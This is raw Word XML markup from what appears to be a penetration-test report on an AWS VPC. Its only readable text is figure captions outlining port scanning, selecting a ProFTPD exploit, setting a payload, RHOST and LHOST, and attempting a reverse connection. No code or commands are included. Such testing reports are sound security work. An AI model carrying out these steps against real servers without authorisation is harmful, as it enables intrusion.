    <w:p w14:paraId="134A1EB7" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="00337A00"/>
    <w:p w14:paraId="07838516" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="00337A00"/>
    <w:p w14:paraId="5B9549F3" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="00337A00"/>
    <w:p w14:paraId="0942C885" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="00337A00"/>
    <w:p w14:paraId="6213569A" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="00337A00"/>
    <w:p w14:paraId="1AEE4C4E" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="00337A00"/>
    <w:p w14:paraId="42F21790" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="00337A00"/>
    <w:p w14:paraId="24F0D4F4" w14:textId="5E034531" w:rsidR="00337A00" w:rsidRDefault="00A55F7D" w:rsidP="00337A00">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00337A00">
        <w:t xml:space="preserve">Scanning for open port target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00337A00">
        <w:t>topwards</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00337A00">
        <w:t xml:space="preserve"> AWS-VPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40680E1C" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72F21113" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B85FBFD" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E20FCF0" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02946FD6" w14:textId="77777777" w:rsidR="0073770F" w:rsidRDefault="0073770F" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139326E8" w14:textId="29338E4D" w:rsidR="0073770F" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69407DE8" wp14:editId="2A891017">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>695324</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-714374</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4299085" cy="2417316"/>
            <wp:effectExtent l="0" t="0" r="6350"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tp-1.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99085" cy="2417316"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03791B95" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5823D93A" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B97BBA" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="00337A00">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A16610A" w14:textId="77777777" w:rsidR="00A55F7D" w:rsidRDefault="00A55F7D" w:rsidP="00337A00">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CE2FB8E" w14:textId="427C9603" w:rsidR="00337A00" w:rsidRDefault="00A55F7D" w:rsidP="00337A00">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:7</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00337A00">
        <w:t>Set RHOST as a AWS-VPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CC5229" w14:textId="4093CE27" w:rsidR="00337A00" w:rsidRDefault="00A55F7D" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A2EEE6E" wp14:editId="290381CC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>638174</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>43816</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4322665" cy="2428240"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="9" name="Picture 9" descr="C:\Users\ThinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\ft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hinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\ftp-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22665" cy="2428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789C39" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C0E32CA" w14:textId="7252AF9B" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07BF416F" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16001B00" w14:textId="424FFF32" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="00337A00">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D2E6EA4" w14:textId="77777777" w:rsidR="00A55F7D" w:rsidRDefault="00A55F7D" w:rsidP="00337A00">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D189CA1" w14:textId="177D3648" w:rsidR="00337A00" w:rsidRDefault="00A55F7D" w:rsidP="00A55F7D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:8</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4A36DEA5" wp14:editId="13B16AFD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>571500</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>236220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4486275" cy="2526665"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6985"/>
            <wp:wrapNone/>
            <wp:docPr id="11" name="Picture 11" descr="C:\Users\ThinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\ft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hinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\ftp-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86275" cy="252666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Searching for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>proftp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543D86DB" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576B6C81" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A77BD7" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1846A42D" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F2E6EBF" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08ADC4EA" w14:textId="77777777" w:rsidR="00A55F7D" w:rsidRDefault="00A55F7D" w:rsidP="00337A00">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50004D1A" w14:textId="43F4041E" w:rsidR="00337A00" w:rsidRDefault="00A55F7D" w:rsidP="00337A00">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:9</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00337A00">
        <w:t>Change HTTP header to true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B79F199" w14:textId="7594625A" w:rsidR="00337A00" w:rsidRDefault="00886047" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251670528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="248C9DAD" wp14:editId="5B3A0818">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>638175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-525145</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4448175" cy="2501900"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="12" name="Picture 12" descr="C:\Users\ThinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\ftp-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hinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\ftp-5.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48175" cy="2501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2DA7D9" w14:textId="24FC13E8" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BB46FB0" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742D71B9" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E70CEA8" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30228C8E" w14:textId="0F6A9FD0" w:rsidR="00337A00" w:rsidRDefault="00A55F7D" w:rsidP="00337A00">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Figure</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:10</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00337A00">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="362689D8" wp14:editId="1C368B3D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>638175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>209550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4429125" cy="2491105"/>
            <wp:effectExtent l="0" t="0" r="9525" b="4445"/>
            <wp:wrapNone/>
            <wp:docPr id="13" name="Picture 13" descr="C:\Users\ThinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\ftp-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ThinkPad\AppData\Local\Microsoft\Windows\INetCache\Content.Word\ftp-5.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29125" cy="2491105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00337A00">
        <w:t>Setting paylo</w:t>
      </w:r>
      <w:r w:rsidR="007D3AE7">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00337A00">
        <w:t>d for ftp server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66773A28" w14:textId="6E77660E" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06FF03DA" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00436438" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3468574A" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73885296" w14:textId="4FD543DF" w:rsidR="00D00950" w:rsidRDefault="00D00950" w:rsidP="00915C64">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BBF71B" w14:textId="7EF75179" w:rsidR="00337A00" w:rsidRPr="00D00950" w:rsidRDefault="00A55F7D" w:rsidP="00D00950">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A55F7D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A55F7D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:11</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A55F7D">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00915C64" w:rsidRPr="00337A00">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Set the reverse per for exploitation and trying to exploit</w:t>
      </w:r>
      <w:r w:rsidR="00915C64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251672576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EEBA88B" wp14:editId="3CF5C36B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>695325</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>316865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4033520" cy="2268220"/>
            <wp:effectExtent l="0" t="0" r="508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tp-1.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33520" cy="2268220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21037651" w14:textId="088E7027" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CDEBB0C" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27BA88FD" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A260C48" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60B1ECBD" w14:textId="77777777" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15FE9C7C" w14:textId="77777777" w:rsidR="00886047" w:rsidRDefault="00886047" w:rsidP="00886047">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="576"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64EAAFB4" w14:textId="77777777" w:rsidR="00701604" w:rsidRDefault="00886047" w:rsidP="00701604">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00886047">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00886047">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:12</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00886047">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00701604">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00701604">
        <w:t xml:space="preserve">setting the LHOST as a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00701604">
        <w:t>pentester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00701604">
        <w:t xml:space="preserve"> IP which is 10.86.4.166</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D3EC8C" w14:textId="6D014616" w:rsidR="00337A00" w:rsidRPr="00886047" w:rsidRDefault="00337A00" w:rsidP="00886047">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="0" w:afterAutospacing="0"/>
        <w:ind w:left="576"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71268130" w14:textId="5B41A00E" w:rsidR="00337A00" w:rsidRDefault="00337A00" w:rsidP="0073770F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
